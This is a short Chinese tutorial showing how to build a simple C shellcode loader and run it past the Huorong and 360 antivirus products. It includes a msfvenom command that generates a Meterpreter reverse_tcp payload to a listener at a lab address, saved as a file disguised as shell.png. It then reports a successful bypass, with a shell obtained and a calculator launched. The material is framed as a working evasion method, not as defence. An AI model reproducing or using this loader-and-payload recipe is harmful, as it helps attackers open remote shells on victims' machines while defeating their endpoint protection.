“当我在进程里看见一只豆豆鞋时，我就知道我们都多余了” ——“360”“火绒”

🌳实现一个C加载器

上面的加载器用了很简单的实现，没有做任何加密解密的处理

下面的shellcode也不打算做任何加密解密的处理

🥗利用MSF生成shellcode

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.112.128 port=4444 -f raw -o shell.png

这里就是简单生成一个图片shellcode

不涉及加解密

📐把加载器编译成exe文件

这里先选好32位(X86)的release

然后

直接生成解决方案

得到exe文件

🎇运行程序测试效果

火绒静态查杀直接bypass

下面直接尝试在开启火绒的条件下运行，首先MSF开启监听：

直接运行：

火绒毫无反应

尝试弹个计算器：

都多余了！

360同理：